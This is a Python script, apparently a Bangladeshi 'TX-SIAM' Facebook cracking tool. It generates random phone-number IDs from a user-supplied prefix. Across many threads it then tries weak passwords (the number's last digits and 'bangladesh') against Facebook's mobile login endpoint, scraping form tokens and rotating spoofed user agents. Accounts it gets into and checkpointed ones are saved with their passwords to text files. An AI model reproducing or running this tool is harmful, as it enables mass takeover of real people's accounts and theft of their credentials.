#!/usr/bin/python3

#-*-coding:utf-8-*-

#!/usr/bin/python3

import requests,bs4,json,sys,random,datetime,time,re,subprocess,platform,struct

from bs4 import BeautifulSoup as sop

from concurrent.futures import ThreadPoolExecutor as ThreadPool

import os

import random

import requests,bs4,json,sys,random,datetime,time,re,subprocess,platform,struct

from bs4 import BeautifulSoup as sop

from concurrent.futures import ThreadPoolExecutor as tred

import base64

import os,sys,time,json,random,re,string,platform,base64

import requests

from concurrent.futures import ThreadPoolExecutor as ThreadPool

import mechanize

from requests.exceptions import ConnectionError

import string

try:

    import requests

except ImportError:

    print('\n [✓] installing requests !...\n')

    os.system('pip install requests')

try:

    import concurrent.futures

except ImportError:

    print('\n [✓] installing futures !...\n')

    os.system('pip install futures')

try:

    import bs4

except ImportError:

    print('\n [✓] installing bs4 !...\n')

    os.system('pip install bs4')

import requests, os, re, bs4,platform, sys, json, time, random, datetime, subprocess, threading, itertools,base64,uuid,zlib

from concurrent.futures import ThreadPoolExecutor as ahmadAXI

from datetime import datetime

from bs4 import BeautifulSoup

ct = datetime.now()

n = ct.month

bulan = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'Agustus', 'September', 'October', 'November', 'December']

try:

    if n < 0 or n > 12:

        exit()

    nTemp = n - 1

except ValueError:

    exit()

logo = ('''

_______________  ___   _________.___   _____      _____   

\__    ___/\   \/  /  /   _____/|   | /  _  \    /     \  

  |    |    \     /   \_____  \ |   |/  /_\  \  /  \ /  \ 

  |    |    /     \   /        \|   /    |    \/    Y    \

  |____|   /___/\  \ /_______  /|___\____|__  /\____|__  /

                 \_/         \/             \/         \/ 

 

--------------------------------------------------------------------

• Ariyan ahammed siam

• Toxic siam

--------------------------------------------------------------------

''')

current = datetime.now()

ta = current.year

bu = current.month

ha = current.day

op = bulan[nTemp]

P = '\x1b[1;97m' # 

M = '\033[1;31m' # 

H = '\033[1;32m' # 

K = '\x1b[1;97m' # 

B = '\x1b[1;97m' # 

U = '\x1b[1;95m' # 

O = '\x1b[1;97m' # 

N = '\x1b[0m'    # 

my_color = [

 P, M, H, K, B, U, O, N]

warna = random.choice(my_color)

data,data2={},{}

aman,cp,salah=0,0,0

ubahP,fuck,pwBaru=[],[],[]

ok = []

mnum=[]

cp = []

id = []

user = []

loop = 0

oks = []

cps = []

loop = 0

url_lookup = "https://lookup-id.com/"

url_mb = "https://m.facebook.com"

url_ip = "https://www.httpbin.org/ip"

header_grup = {"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}

bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "Augustus", "09": "September", "10": "October", "11": "November", "12": "December"}

done = False

uj=[]

for x in range(10000):

    aa='Mozilla/5.0 (Linux; U; Android'

    b=random.choice(['6','7','8','9','10','11','12','13','8.1.0'])

    c=' en-us; GT-'

    d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])

    e=random.randrange(1, 999)

    f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])

    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'

    h=random.randrange(73,100)

    i='0'

    j=random.randrange(4200,4900)

    k=random.randrange(40,150)

    l='Mobile Safari/537.36'

    uaku24=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'

    uj.append(uaku24)

    

    

def jalan(z):

    for e in z + '\n':

        sys.stdout.write(e)

        sys.stdout.flush()

        time.sleep(0.01)

def main():

    user=[]

    os.system('clear')

    print(logo);print('\033[m[\033[mCode  BD-017]')

    kode = input('\033[m[•]Input Code : ')

    os.system('clear')

    limit = int(input('\033[m[•]\033[mLIMIT : '))

    os.system('clear')

    print(logo)

    print(40*'-')

    for nmbr in range(limit):

        nmp = ''.join(random.choice(string.digits) for _ in range(8))

        user.append(nmp)

    with ThreadPool(max_workers=30) as yaari:

        os.system('clear')

        print(logo)

        tl = str(len(user))

        for guru in user:

            uid = kode+guru

            pwx = [guru,'bangladesh']

            yaari.submit(rcrack,uid,pwx,tl)

    print('___________________________________')

    print('Crack process has been completed')

    print('Ids saved in ok.txt,cp.txt')

    print('___________________________________')

    

    

P = '\x1b[1;97m'

M = '\x1b[1;91m'

H = '\x1b[1;92m'

K = '\x1b[1;93m'

B = '\x1b[1;94m'

U = '\x1b[1;95m' 

O = '\x1b[1;96m'

N = '\x1b[0m'    

Z = "\033[1;30m"

sir = '\033[41m\x1b[1;97m'

x = '\33[m' # DEFAULT

m = '\x1b[1;91m' #RED +

k = '\033[93m' # KUNING +

h = '\x1b[1;92m' # HIJAU +

hh = '\033[32m' # HIJAU -

u = '\033[95m' # UNGU

kk = '\033[33m' # KUNING -

b = '\33[1;96m' # BIRU -

p = '\x1b[0;34m' # BIRU +    

#id=[]

ua_m_a,tota,id,id2,loop,ok,cp,akun,oprek,method,lisensiku,taplikasi,tokenku,uid,lisensikuni= [],[],[],[],0,0,0,[],[],[],[],[],[],[],[]

cokbrut=[]

pwpluss,pwnya=[],[]

ses=requests.Session()

tl = str(len(user))

def rcrack(uid,pwx,tl):

    global loop

    global cps

    global oks

    global agents

    try:

        for ps in pwx:

            session = requests.Session()            

            sys.stdout.write(f'\r\x1b[m[TX-SIAM] %s| OK:-\x1b[1;92m%s'%(loop,len(oks))),

            sys.stdout.flush()

            pro = random.choice(uj)

            free_fb = session.get('https://mobile.facebook.com').text

            log_data = {

                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),

            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),

            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),

            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),

            "try_number":"0",

            "unrecognized_tries":"0",

            "email":uid,

            "pass":ps,

            "login":"Log In"}

            header_freefb = header_freefb = {'authority': 'mobile.facebook.com', 'method': 'GET', 'scheme': 'https', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-encoding': 'gzip,', 'accept-language': 'en-US,en;q=0.9', 'sec-ch-ua': '"Chromium";v="106",', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Windows"', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': pro}

            lo = session.post('https://mobile.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100',data=log_data,headers=header_freefb).text

            log_cookies=session.cookies.get_dict().keys()

            if 'c_user' in log_cookies:

                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])

                cid = coki[7:22]

                print('\r\33[m[TX-SIAM-\33[1;92mOK\33[m] \33[1;92m+88'+uid+' | '+ps+'\33[0;97m')

                oks.append(cid)

                open('TX-SIAM.ok.txt', 'a').write(cid+' | '+ps+'\n')

                oks.append(cid)

                break

            elif 'checkpoint' in log_cookies:

                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])

                cid = coki[24:39]

                print('\r\33[m[YX-SIAM-\33[1;91mCP\33[m]\33[1;91m +88'+uid+' | '+ps+'\33[0;97m')

                open('cp.txt', 'a').write(cid+' | '+ps+'\n')

                cps.append(cid)

                break

            else:

                continue

        loop+=1

    except:

        pass

os.system('git pull')

main()

